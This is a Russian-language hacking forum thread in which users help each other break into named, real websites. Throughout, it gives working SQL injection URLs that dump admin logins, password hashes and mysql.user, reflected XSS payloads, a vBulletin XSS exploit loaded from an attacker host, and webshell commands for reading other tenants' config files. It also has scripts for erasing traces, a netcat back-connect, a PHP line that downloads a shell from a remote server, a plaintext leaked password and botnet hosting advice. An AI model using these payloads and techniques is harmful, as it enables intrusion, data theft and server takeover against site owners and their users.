таблицы user нету в той базе, в которой работает сайт.

нет такой таблицы.
сначала попробуй вытащить названия всех таблиц через information_schema

Через информатион.схема и вытащил!!!
Потом прочитал все columns и вот сейчас выдает это!!
Если кому-то не лень, стукните в аську 24-три9-24 плиз :)

посмотри базу в которой таблица лежит...
select table_schema from information_schema.columns where table_name='users'
select concat_ws(0x3a,table_schema,table_name,column_name ) from information_schema.columns

Может кто подскажет какая есть альтернатива функции LIMIT в Oracle. Хотелось просмотреть название таблиц и колонок.

Хочу вывести название колонок, но при
/video.php?id=-9999+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+fr om+IINFORMATION_SCHEMA.COLUMNS+where+table_name='l ogin_access'--
Выводит
query failed:SELECT * FROM podcast WHERE id=-9999 union select 1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43 from IINFORMATION_SCHEMA.COLUMNS where table_name=login_access-- ORDER BY date DESC LIMIT 0,1
Пробовал
-9999+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+fr om+IINFORMATION_SCHEMA.COLUMNS+where+table_name=(0 x6c6f67696e5f616363657373)--
Выводит почти тоже самое
query failed:SELECT * FROM podcast WHERE id=-9999 union select 1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43 from IINFORMATION_SCHEMA.COLUMNS where table_name=(0x6c6f67696e5f616363657373)-- ORDER BY date DESC LIMIT 0,1

Может я чего не так делаю или как нибудь по другому нужно. Хелп, плиз.
Версия 5.0.45-log

Может кто подскажет какая есть альтернатива функции LIMIT в Oracle. Хотелось просмотреть название таблиц и колонок.

попробуй concat_all

2 hackmen:

скобки убери, когда хексишь, и "--" пишется в конце всех запросов и условий

вместо -- пиши /*
это тебе не мсскл

ну и кавычки ещё по-хорошему писать надо

hackmen, чтоза IINFORMATION_SCHEMA ?

hackmen, чтоза IINFORMATION_SCHEMA ?
Вот черт =)
Спасиб!

Может кто подскажет какая есть альтернатива функции LIMIT в Oracle. Хотелось просмотреть название таблиц и колонок.
http://forum.antichat.ru/showpost.php?p=449408&postcount=5

[QUOTE=Pashkela]попробуй concat_all

Привиди пример. А то что то у меня ничего не выходит.

MSSQL:
Можно ли одним запросом вывести все таблицы c соответствуюющими им колонками? (в файл через makewebtask)

В моей практике я такого не замечал. возможно вывести все таблицы которые есть в строчку, то есть если тебе выдает по одному столбцу или колонке не обязательно юзать limit а возможно посмотреть вомандой group_concat Пр: =-1+union+select+1,group_concat(unhex(hex(table_name ))),3+from+information_schema.tables--
выведутся все таблицы в строчку через запятульку. так же и с колонками в таблице. Способ упрощает твою задачу во много раз. Удачи

Ghost0ff
это в mysql,а человек спрашивает за mssql.
Тем более, что group_concat() выводит только первую 1000 знаков (или как то так), если не ошибаюсь. Но все таблицы ты не выведешь.

zenon2

LIMIT 1 OFFSET 1

а, ступил, это в постгрессе

@SHS
'; EXEC sp_makewebtask 'c:\inetpub\wwwroot\out.htm', "SELECT * FROM information_schema.COLUMNS";--

@zenon2
используй способ, который я привел в ссылке. Имхо более подоходящего не найти

посмотрите плиз
http://www.mk-computer.ru/catalog.php?cat=1&sort=-1
это скуль?

F4R не совсем но тут может быть скуль
попробуй поподбирай поля!
если не подбираються значит ее нету

посмотрите плиз

это скуль?


Нет,но это скуля

http://www.mk-computer.ru/news.php?detail=-128+union+select+1,2,3,4,5,concat_ws(0x3a3a,versio n(),user(),database()),7--

это скуль?
да это скуль после order by
_mk-computer.ru/catalog.php?cat=1&sort=cena*(substring(version(),1,1)=4)--+

как бы ещё бы щас подобрать таблу...
что-б в админку попасть))

помогите тож с скуль иньектом
проблема что фильтруются
запрос sportID=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,CHAR(39,60,115,99,114,105,112,116,62,97 ,108,101,114,116,40,50,49,51,41,32,60,47,115,99,11 4,105,112,116,62,39),20+from+t_sports+order+by+lev el+into+outfile+'/tmp/1.txt'/*
Так как путь указан с кавычками то выпрыгивает ерор:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/tmp/1.txt''/* ORDER BY Level' at line 1
Как обойти фильтрацию?

в хекс переведи или в чар

обойди с пхпмайдмина)) путь нельзя хексить или чаром...надо только текстом))

gisTy путь чарить нельзя
а можно подробнее как можно обойти с пхпмайадмина

получаешь логин:пасс юзера, ищешь майадмин и через него льёш шелл

gisTy путь чарить нельзя
а можно подробнее как можно обойти с пхпмайадмина
а че и в хекс перевести нельзя чтоле?

ага тока с подбором таблиц тож проблема
да и к майадмин доступ запрещен

gisTy

там надо чисто текст в кавычках передовать, хексы и тп не работают

crazy~driver
имеется ввиду таблица mysql.user
если у юзера к ней прав нет, можно поискать скули на соседних сайтах

спс spyder

других вариантов нет?

ищи скули на других сайтах

diznt, из шелла конектись к серваку рутай и ставь что надо........
скачай netcat? хапусти и набери nc -l -n -v -p 3137, в шелле пропиши свой РЕАЛЬНЫЙ ip и нажми бакконект....

Скуля??
http://vdex.spb.ru/photo/subcat.php?id_catalog=%27
просто на такой же цмске раскрутил нормально а здесь что то никак(

Слепая sql-inj
http://vdex.spb.ru/photo/subcat.php?id_catalog=3/**/union/**/select/**/1,2/*

ребята, помогите по братски. надо как небудь проникатся один форум на движке: vBulletin® Version 3.7.3.
поиском конечно пользовался и нашел вот этот эксплоит: http://milw0rm.com/exploits/7174

Теперь никак не могу понять как волпользоватся данным эксплоитом. можете помочь ?
а также был бы очень рад, если подсказали другие способы.

-m0rgan-
омг, какой си ?? Это js


сохраняешь код в nbd.js, заливаешь на сервер
дальше по инструкции:

The commenter posts a XSS vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach.


+
.для него качай интерпретатор и запускай через него этот сплойт...
Си сплойты надо сначала скомпилировать, а потом запускать... ;)

Spyder
был бы разрешен я бы об этом обезательно написал )

ILYAtirtir
там все просто..

5.1.2600.2180.
Почему при удаленном коннекте меня выкидывает ? Версия-то termsrv.dll не старая.

http://www.newsarmenia.ru/search/?p=0&query=%22%3E%3Cscript%3Ealert(%2FoO%2F)%3C%2Fscrip t%3E

http://www.newsazerbaijan.ru/search/?p=0&query=%22%3E%3Cscript%3Ealert(%2FoO%2F)%3C%2Fscrip t%3E

http://www.pln-pskov.ru/search/?text="><script>alert(%2FoO%2F)<%2Fscript>&sortby=time

http://lipetsknews.ru/search/?search=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FoO%2 F%29%3C%2Fscript%3E&k=%CD%E0%E9%F2%E8

http://www.snews.ru/search.php

tsesar
Ничего не перепутал? xD

ребята, помогите по братски. надо как небудь проникатся один форум на движке: vBulletin® Version 3.7.3.
поиском конечно пользовался и нашел вот этот эксплоит: http://milw0rm.com/exploits/7174

Теперь никак не могу понять как воспользоватся данным эксплоитом. можете помочь ?
а также был бы очень рад, если подсказали другие способы.

ну или хоть скажите суть этого эксплоита.

B1t.exe
XSS в модуле Visitor Messages

[dei]
ну да, это круто, но мне надо понять эффективнось этого скрипта, суть..
и вообше стоит братся за это - в целях взлома форума ?

Подскажите, как можно раскрутить скулю
http://www.world-art.ru/people.php?id=-1'
Там инъекция есть, просто сразу перебрасывает на страницу с ошибкой, поэтому вернитесь на страницу назад.

Подскажите, как можно раскрутить скулю

Там инъекция есть, просто сразу перебрасывает на страницу с ошибкой, поэтому вернитесь на страницу назад.
c чего ты взял что там есть инъекция?вывод на 1 и на 9999 одинаковый..по моему там скулей даже и не пахнет..

Ну хз скуля это или нет.. вот что выводит:
Warning: mysql_close(): supplied argument is not a valid MySQL-Link resource in /usr/local/www/vhosts/world-art.ru/httpdocs/people.php on line 1889

admin:4b6dP//qJjChSbt+7It3DYY=
Что за хеш?

Чем то похоже на DES (Unix)....Скорее всего с какого то форума...

Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
не сказал бы что очень уж похоже не дес, и как понять что с форума ? :D

походит на base64, а точнее на md5-base64 .. хотя не зватает 4х символов ..

хотя не зватает 4х символов ..
Всё там хватает :) у них по 24, одна из этих :

MD5(Base64)
MD4(Base64)
MD2(Base64)

Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
Мда (с) :D

как оно?
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+or+1=2/*
хз не подберается)
http://www.astafiev.ru/forum.php?UID=16197+union+select+1,2/*
вывода нету чтоли?
http://juggling.tv/vaults/uvideos.php?UID=347+or+1=1/*
немогу разкуртить =0
http://www.fortwaynereader.com/story.php?uid=-728+or+1=1

http://juggling.tv

http://juggling.tv/vaults/uvideos.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7, 8,9,20,21,2,3,4,5,6,7,8,9,30,31,2,3,4,5--

____________________________________________

http://www.astafiev.ru

Да, без вывода.

____________________________________________

http://www.fortwaynereader.com

Тут, похоже, нужно указывать группировку по полю

R1dex juggling.tv
принтабельных тож нету? )

http://www.legis.krsn.ru/lawsinfo.php?UID=705+union+select+1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9
не подбор )

R1dex juggling.tv
принтабельных тож нету? )

Ага.

http://www.legis.krsn.ru/

http://www.legis.krsn.ru/lawsinfo.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

R1dex
угу.. нужно брутить) там еще и sobranie.info домен )
http://www.sobranie.info/adm/

кста стукни;)

http://www.mymaika.ru/page.php?id=-120+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
подобрал, вроде 14. но ошибка
в чем трабл?

Трабла в том, что это 3-я ветка. В ней нету оператора объединения запросов union.

2 R1dex , sabe
http://www.astafiev.ru/topic.php?UID=-119+union+select+111,version()/*
Есть вывод ;)

Да, тут есть, но конкретно в том случае - нету. ;)

В соседней темы выкладывалась скуля
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9--
Почему при
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,login,pass),3,4 ,5,6,7,8,9+from+drupalusers--
Вылазит ошибка Fatal error: Call to a member function recordcount() on a non-object in /home/yesoudo/www/channel_detail.php on line 14??
Пробовал переводить название таблицы в CHAR :(

Вылазит ошибка Fatal error: Call to a member function recordcount() on a non-object in /home/yesoudo/www/channel_detail.php on line 14??
Пробовал переводить название таблицы в CHAR :(
потому что таблица находится в другой базе
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,login,pass),3,4 ,5,6,7,8,9+from+garmenia.drupalusers--


Bonus;)
доступ к mysql.user:
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat(user,0x3a,password,0x3a,h ost,0x3a,file_priv),3,4,5,6,7,8,9+from+mysql.user--

чтение фалов:
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,LOAD_FILE(CHAR(47,104,111,109,10 1,47,121,101,115,111,117,100,111,47,119,119,119,47 ,99,104,97,110,110,101,108,95,100,101,116,97,105,1 08,46,112,104,112)),3,4,5,6,7,8,9--

Подскажите, что за косяк:
Скуля 4-ка:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12,13,14+from+adminrights limit 0,1--
Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1"
Что делаю не так?

Подскажите, что за косяк:
Скуля 4-ка:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12,13,14+from+adminrights limit 0,1--
Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1"
Что делаю не так?
Надо крутить либо 0,2 0,3 0,4 или 2,1 3,1 4,1 одно из двух, везде работает по разному.

Надо крутить либо 0,2 0,3 0,4 или 2,1 3,1 4,1 одно из двух, везде работает по разному.

Пробовал, до полусотни докрутил.

2Octave_Parango дык мож там тока одна запись?)

потому что таблица находится в другой базе
расшифровал хеш юзера, но почему то не заходит в аккаунт... (
login 1225532271
pass arnaud2007
name michamk

Странно..

j0ker13, что-то мне кажется, что так оно и есть.

2 Octave_Parango:

проверь так:

http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--

2 Octave_Parango:

проверь так:

http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--

Отображается так же одна запись как и при limit 0,1

Получается там все одна запись?

да, 100%, иначе group_concat вытащил бы несколько записей по любому

и потом чо тут удивительного, что админ всего один. Обычно их больше 3-5 и не бывает.

Похоже на то...

Я что-то пропустил. или count() отменили? )

Разве так не проще?
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,count(*) ,12,13,14+from+adminrights--

jokester, Действительно, так проще, и запись действительно одна.

jokester
Если не ошибаюсь, то count() и null ячейки будет считать,и пустые.
Например покажет, что записей 25, а будет всего 3, остальные пустые.Но он их посчитает.

Для начала всех с наступающим новым годом ))
Теперь вопрос.
Поимел шелл на серваке, не на том сайте, который мне нужен,но надеясь получить к нему доступ.
Safe_mode оказался: OFF
Нахожусь в директории где шелл (путь)
/home/s/site/site.com/public/www/admin/
При попытке перейти в директорию /home/ редиректит назад на /home/s/site/site.com/public/www/admin/
Шелл
(r57shell v.1.42)
Если выполняю команду ls -la /home/ переходит удачно и всё показывает. Так добрался до нужного мне сайта
ls -la /home/t/target/target.com/public/www/
Там нашёл файл config.php, с данными для коннекта к бд.
Как мне его прочитать?
Скачать не получилось
Ввожу в :: Download files from server :: путь к файлу
/home/t/target/target.com/public/www/config.php
редиректит назад в директорию с шеллом.
Если выполняю команду
more /home/t/target/target.com/public/www/config.php
или
more config.php
выдаёт пустой экран в шелле.
Что делать? Я почти неделю убил на поиск уязвимостей, и тут такой облом :'(

Вот стат с шелла

PHP version: 5.2.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF MySQLi: ON mSQL: OFF SQLite: ON
Safe_mode: OFF Open_basedir: VIRTUAL_DOCUMENT_ROOT:/usr/local/lib/php:/usr/local/lib/ph:/home/sys/phplib/:/usr/local/bin/ Safe_exec_dir: /usr/local/php/bin Safe_gid: OFF Safe_include_dir: NONE Sql.safe_mode: OFF
Disable functions : NONE
Free space : 0 B Total space: 0 B
Useful: mod_include(SSI)
Dangerous: -
Downloaders: fopen

И ещё вопрос. Все сайты на одном серваке, но на многих PHP version: 5.2.6 а на некотрых четвёртая. (в том числе и на том, на который я залил шелл) Как так?
Помогите прочитать файл плз (или скачать его).Очень прошу.

Попробовать сделать так - написать и залить туда такой скрипт:


<?
$file = file_get_contents("абсолютный_путь_к_файлу");
if(!file) echo 'Ошибка открытия файла';
else echo $file;
?>

2
Pashkela +
2
Imperou$
Если не выйдет-из папки с шеллом выполняем
tar -czvf arch.tar.gz /home/t/target/target.com/public/www/
можешь и файл вписать.
Cоздаст архив arch.tar.gz в папке с шеллом, внутри будет необходимое тебе содержание.Просто скачай и смотри.

ThreeD
Спасибо, плюс.
Но архивит весь сайт =) Теперь качаю.
Pashkela
Warning: file_get_contents() [function.file-get-contents]: open_basedir restriction in effect. File(/home/t/target/target.com/public/www/config.php) is not within the allowed path(s) in /home/s/site/site.com/public/www/1.php on line 2

Хыыы...
Теперь у меня вопрос =)
Нифига не могу удалить через шелл с сервака свои залитые файлы. Т.е. залить любой могу, а вот удалить нет.
Ни
rm
rm -r
rm -f
rm -rf
Не помогают =(
Вопрос, как быть? Снести надо сроооочно, иначе ппц паливо устроят.

2 ThreeD:

http://ru2.php.net/manual/ru/function.chown.php
http://ru2.php.net/manual/ru/function.chmod.php

Главное: http://ru2.php.net/unlink


2 Imperou$:


is not within the allowed path(s) in /home/s/site/site.com/public/www/1.php on line 2


вообще-то это тот сервер, где ты сейчас со своим шеллом сидишь, возьми да поправь

Pashkela
В php не силён.Давай подробнее. Кодить не умею я =)

Делаешь такой скрипт, обзываешь его del.php к примеру, заливаешь на сайт:


<? unlink ('абсолютный_путь_ до_файла/то_что хотим_удалить');
unlink ('абсолютный_путь_ до_файла/del.php'); //Самоудаляемся, не оставляем вообще никаких следов, кроме как в логах фтп и прочих
?>


запускаешь

Pashkela

Я залил скрипт 1.php с таким содержанием

<?
$file = file_get_contents("/home/t/target/target.com/public/www/config.php");
if(!file) echo 'Ошибка открытия файла';
else echo $file;
?>


на серв /home/s/site/site.com/public/www/
Что поменять?? o_O

2 Imperou$:


in /home/s/site/site.com/public/www/1.php on line 2

Забей, юзай способ от ThreeD, только в конце укажи название файла, а не просто директорию

Народ есть sql inj. Определяю через group by что количество столбцов 5. Но когда пытаюсь использовать id=1'+union+select+1,2,3,4,5/* говорит Query failed: The used SELECT statements have a different number of columns хотя group by говорит что их именно 5. В чем может быть проблема?

На запрос id=1' получаю ответ Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' ORDER BY issue_date DESC LIMIT 1' at line 3

Такое впечатление что injection тут после ORDER BY. Но что то я не могу найти где подробней про нее почитать. Может кто подскажет ?

Сначала надо оценить и правильно понять первоначальную ошибку при выявлении sql-inj. Если в тексте ошибки есть что-то типо left join - значит в запросе участвует не одна таблица, а как минимум две, то данные не выведутся скорее всего, фактически получается blind sql inj

Сначала надо оценить и правильно понять первоначальную ошибку при выявлении sql-inj. Если в тексте ошибки есть что-то типо left join - значит в запросе участвует не одна таблица, а как минимум две, то данные не выведутся скорее всего, фактически получается blind sql inj


Все ошибки что есть я запостил.

если можешь, ссылку кинь в личку

Короче нашел, лень в аську выходить просто:))

http://сайт.ru/print.php?id=1'+union+select+1,2,3,4,5,6,7,8,9,10, version(),12/*

просто ты неправильно подобрал кол-во колонок. Лучше всегда подбирать через order+by, т.к. там всегда пишет конкретно, а не фигню всякую.

Поздравляю, там 4.1.20-log:)

Только брут

Помогите, пжста, подобрать колонки ;)
:)) все подобрал ))

Смешной парень, личка тебе уже не поможет:)

http://www.spoonohost.com/about/news.php?id=-1+union+select+1,2,3,4,version()--

Ну и что ты этим хотел сказать?? я знаю какая версия БД.. :/

Thrasher88, т.к. тут 4ая версия mysql, тебе прийдеться угадывать колонки, можно вручную или можешь попробовать с помощью программы SIPT 4!Пока нашел токо: id

2 Thrasher88:

личку читай

Thrasher88
Лови, больше ничего не подобрал.
id
ip
lastname
phone
status
zip
Раз линк засветил, глупо скрывать в лс =)

Вот еще подобрал: nickname

Ребята, подскажите.
Залил шелл, на сервере хостятся еще порядка 700 сайтов, такой вопрос, могу ли я "полазить" по рядом лежащим или только по одному?

Octave_Parango, выйди в начальную директорию и попробуй(если сайты находятся на одном серваке, то по идее да!), мож шелом в лс поделиться если хоч, посмотрю!

Octave_Parango
Посмотри на шелле, safe_mode включён или нет.
Если выключен-лезь в корень.
ls -la /home/ или просто /home/
можно просто /
Смотря как у тебя начинается путь.

И так есть форум на IPB 2.3.5
там я нашол папку "convert"
когда я перешол в эту папку (то есть в строке браузера sait.ru/convert)
то там увидел что можно посмотреть путь к сайту (то есть D:\blabla\blabla\sait.ru\www)
логин и пароль к БД
Что это вообще такое?
Я потом порыскал в гугле и нашол что это какой то плагин IPB и связанное что то с SMF
сылка dev.russiangun.ru/convert/

I love this game, Да. разобрался чиво где, спасибо.

ThreeD, safe_mode OFF, в /home не могу зайти, пишет: Can't open folder (/home/)!
file-mode (/home), drwx--x--x.
Прав что ли не хватает?

выполни команду ls -la /home/

лучше просто ls

ls -la не всегда прокатывает

Пробавал уже и ls и ls -la , все так же Can't open folder (/home/)!

Эммм...
А у тебя вообще есть папка home ?

ThreeD, Да, есть.
По остальным лазию, все ОК, а в эту и в еще пару, ни в какую.

попробуй поменять права на папку:

http://ru2.php.net/manual/ru/function.chmod.php

ЗЫЖ Рекомендация - текст по ссылке читать сверху до низу всю и вкуривать конкретно

Pashkela, есть, пошел изучать. Доброй ночи всем.

Поимел буржуйского хостера.
Где они обычно хранят пароли от фтп?? Кто в курсе?

Честно говоря вовсе не обязательно хранить пароли на сервере. Их элементрано можно хранить например в БД. Или в .txt на совершенно другом сервере. Всё по ситуации

Ну как то ведь авторизация проходит, при логине юзера.С чем то сравниваются логины и пасы (я просто не в курсе).
В бд их нет.

Ну как то ведь авторизация проходит, при логине юзера.С чем то сравниваются логины и пасы (я просто не в курсе).
В бд их нет.
какой фтп сервак?

А я вам так скажу, судя по гуглу (хотя вполне вероятно, я не прав) - у каждого хостера свои индивидуальные способы хранения и проверки паролей ftp доступа, это типо тайна за семью печатями. Скорее всего охренеть какой алгоритм шифрования, даже если и на серваке хранятся. Ну наверное они таки об таких вещах позаботились. Не всё так просто, даже если и шелл.

Pashkela
Понятно.
Ну если о багах не позаботились, думаю и с фтп попроще будет =) Просто интересны наиболее часто встречающиеся места.
AkyHa_MaTaTa
В смысле какой? Конкретизируй вопрос.

Ну если о багах не позаботились, думаю и с фтп попроще будет =)


не факт, можно купить хостингт и залить свой "шелл" вполне легально (зарегить сайт там, где ломаешь), дырки нет, но это не значит, что "можно будет смотреть все фтп-пароли". Хотя бы даже исходя из таких соображений, что ты потенциальный клиент, но безопасность безопасностью

хочу организовать ботнет. можно ли тут без домена абузоустойчивого организовать?

хочу организовать ботнет. можно ли тут без домена абузоустойчивого организовать?
а чем тебя ip не устраивает?

всмысле. то есть можно забабахать денвер на комп запустить и будет как абузоустойкий ты хочешь сказать? :D

2 Pashkela
Дыры имеются ввиду на сайте самого хостера.
Да и если толком, то чтобы таких казусов не возникало, safe_mod надо включать.
Ты меня не удивил )))

diznt
Можно, но твоему ботнету придёт пиз**ц после первой абузы.
Да и что это будет за ботнет, если владелец не может себе абуз хост купить? =)
На ломанных запалят быстро.
Трафф ты собираешься гнать с фрэймов как я понимаю? Вот от одного админа одна абуза, и всё.

всмысле. то есть можно забабахать денвер на комп запустить и будет как абузоустойкий ты хочешь сказать? :D
при чём тут денвер и домен ??
хостер, да, лучше чтобы был абузный.. но про хост речь не шла ..
а домен тебе зачем спрашиваю!? если можешь вместо домена ip юзать.

если можешь вместо домена ip юзать.

я не понимаю как это? объясни

Набери в браузере 77.88.21.3
попадёшь на яндекс.
Вот так и ты, можешь юзать вместо домена - ip.
Тебе ведь не клиентов заманивать, а трафф принимать. Для ботнета самое то.

я не понимаю как это? объясни
эм.. ну что сказать, сразу напрашивается вопрос - тебе это надо ? :D
по сабжу: боты же должны куданить отстукивать? или к ним снизойдёт озарение и они сами придумают чтобы такого сделать ..
так вот, какая им разница куда стучать??
--
и вообще, нах домен абузный, ты ж не спамить домен собрался ..
ну допустим на связку один домен/ip, а на ботнет уже стоит другой .. хотя на одном тож никто не мешает делать .. но энто лишнее паливо всёже .. хотя на абузном серваке пох ваще.

хелп.
нашёл скулю
http://site.ru/index.php?id_page=216&id_news=36+union+select+1,2,3,concat(table_name,0x 3a,column_name),5+from+information_schema.columns
вывело кучу всего

TRIGGERS:CREATED
TRIGGERS:SQL_MODE
TRIGGERS:DEFINER
USER_PRIVILEGES:GRANTEE
USER_PRIVILEGES:TABLE_CATALOG
USER_PRIVILEGES:PRIVILEGE_TYPE
USER_PRIVILEGES:IS_GRANTABLE
VIEWS:TABLE_CATALOG

(часть списка)

Но читать их не получается, всегда ошибка Table doesn't exist
Можно что-нибудь сделать?

посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns

потом ....+from+dbname.table_name

посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns

потом ....+from+dbname.table_name

вывелось так

information_schema:TRIGGERS:CREATED
information_schema:TRIGGERS:SQL_MODE
information_schema:TRIGGERS:DEFINER
information_schema:USER_PRIVILEGES:GRANTEE
information_schema:USER_PRIVILEGES:TABLE_CATALOG
information_schema:USER_PRIVILEGES:PRIVILEGE_TYPE
information_schema:USER_PRIVILEGES:IS_GRANTABLE

ну выводи теперь то что тебе нужно, в чем проблемма?

У меня пара вопросов по программе SIPT4:
1.Почему в некоторых случаях программа может определить принтабельные поля в инъекции, в других нет? При том что инъекции все простые и одинаковые.
2.Что означает каждая из цифр в поле "принтабельные поля": {2},4,5. Я так понимаю, 4 и 5 - это номер поля, а что означает цифра в фигурных скобках? Но это точно не число принтабельных полей.

Был бы признателен еще если бы кто-нибудь дал линк на подробный мануал по проге (а лучше видео).

в {} принтабельное поле из найденных (мог бы и сам догадаться)

офф. сайт проги - http://dbattack.com/

Любая авто-тулза работает только в так называемых ИДЕАЛЬНЫХ условиях sql-inj, поэтому предпочтительно всё делать ручками, по крайней мере на начальном этапе.

да нет, по-моему... к примеру, есть {2},4,5 - так вот как раз 4 и 5 это принтабельные поля.. ну во всяком случае у меня всегда это были принтабельные поля.. хз, может совпадало так.
http://dbattack.com/ - уже черт знает сколько не работает.

Pashkela правильно сказал, просто ты его недопонял.

{2},4,5 - принтабельные, а конкретно через 2-ое поле, прога будет выводить.

а, все, ясно спасибо ))
Еще один вопрос по этой проге: если я вручную ввожу принтабельные поля, то обязательно их ВСЕ писать? или достаточно, например, ондного - то, через которое все выводится?

Достаточно и одного, главное - заключить поле в скобки.

Как получить голоса на Vkontakte.ru не платив за них?

Как получить голоса на Vkontakte.ru не платив за них?
и как энтот вопрос относится к уязвимостям ??
ну да, конечно возможно есть уязвимость на сайте через которую моно это делать.. но ты думаешь ктонить скажет ? :D тогда уж в раздел покупок пости тему ..

Подскажите, как обойти.. Нашел скулю:
http://www.myprof.ru/prof.php?id=-1'

Подобрал через ORDER BY чило полей, их 3.
Ввожу:
http://www.myprof.ru/prof.php?id=-1+union+select+1,2,3
Но все равно вылазит ошибка Warning: Invalid argument supplied for foreach() in /home/virtwww/w_myprof-ru_decef7ff/http/prof.php on line 14

http://www.petarda.ru/default.asp?tmpl=1%27

просто скажите это скуль?

да

С чего ты взял?
http://www.petarda.ru/default.asp?tmpl=1'
http://www.petarda.ru/default.asp?tmpl=9999999
http://www.petarda.ru/default.asp?tmpl=blablabla
Выводит одинаковый резулбтак...
Это MS SQL же?
Если я не прав, то обьясните мне...

Вот и я так подумал...

нет, это не скуль
а что это?

а вот ещё!
http://www.petarda.ru/default.asp?tmpl=search_list&info=gfd&price_from=&price_to=&orderby=price&ordertype=1%27

пишет: "ошибка БД"

уязвимость?

F4R, нет.

http://www.xyligan.ru/users/eugenie/blog/blog.php?readpost=4233','')
иьект?
https://forum.antichat.ru/showpost.php?p=307103&postcount=1

а вот ещё!
http://www.petarda.ru/default.asp?tmpl=search_list&info=gfd&price_from=&price_to=&orderby=price&ordertype=1%27

пишет: "ошибка БД"

уязвимость?
вообще говоря сортировка меняется
_petarda.ru/default.asp?tmpl=search_list&info=%ED%EE%E2%FB%E9&price_from=0&price_to=9999&orderby=price*1
_petarda.ru/default.asp?tmpl=search_list&info=%ED%EE%E2%FB%E9&price_from=0&price_to=9999&orderby=price*-1
но заюзать багу как говорит Никита Литвинков 50/50 (либо получится, либо нет) ;)

l1ght
и что? как разкрутить http://www.xyligan.ru/users/eugenie/blog/blog.php?readpost=4233','') там просто нужно закоментировать остальное и составить превельное началало запроса..

2 Thrasher88
Это PostgreSQL, идем сюда и читаем http://forum.antichat.ru/showthread.php?t=35599
Пробуем
http://www.myprof.ru/prof.php?id=1+union+select+null,null,null--
получилось.
Принтабельные поля по статье найти не удалось, хз почему, но пробуем втупую через имя колонки
/prof.php?id=-1+union+select+TABLE_NAME,null,null+from+informati on_schema.tables--
и вуаля таблички есть :)
Дальше сам, я не рыл

http://research.sun.com/people/mybio.php?uid=-28941+or+1=1
явахек?))

http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+union+select+1,2,3,4,5 ,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+information _schema.tables/*
логический вывод 5 ветка, что поделать?

http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+union+select+1+limit+1 ,1/*
не подбор

проблема такая,есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл? инклуде не работает
и еще,когда записываешь в файл прибавляется такая фигня -

202 537 9.pdf 22042 application/pdf 1
1 2 202\ 537\ 9.pdf\ 22042\ application/pdf\ 1\
[сюда_вставляется_все_что_я_� �аписываю_через_скуль]\ 2\ 3\ 4\ 5\ 6\
4 5 6

Napas
есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл?
создавай .php файл:
<?php copy("http://site.com/shell.txt","./papka/na/servere/shell.php"); ?>
выполняй его, и shell.php будет твой шелл ;)

aka PSIH
не катит (
Warning: copy(D:/Web/cms/xek.php) [function.copy]: failed to open stream: Permission denied in D:\Web\cms\jj.php on line 2
